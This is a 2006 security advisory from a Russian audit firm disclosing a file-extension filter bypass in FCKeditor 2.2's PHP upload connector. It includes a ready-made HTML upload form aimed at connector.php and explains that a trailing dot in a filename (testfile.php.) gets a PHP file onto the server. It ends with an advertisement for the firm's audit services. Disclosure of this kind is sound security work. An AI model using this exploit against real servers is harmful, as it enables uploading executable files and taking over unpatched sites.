Advisory:
NSAG-¹196-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
FCKeditor 2.2 

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/893.html

Risk: 
Critical 

Description: 
Detour of a filtration of expansions of files is possible. 

Influence: 
Loading of the forbidden files on target system. 
 
Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br> 
<input id="txtFileUpload" type="file" name="NewFile"> 
<br> 
<input type="submit" value="Upload"> 
</form> 

In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.) 
As a result on a server the file testfile.php will be created 

Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!


www.nsag.ru 
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.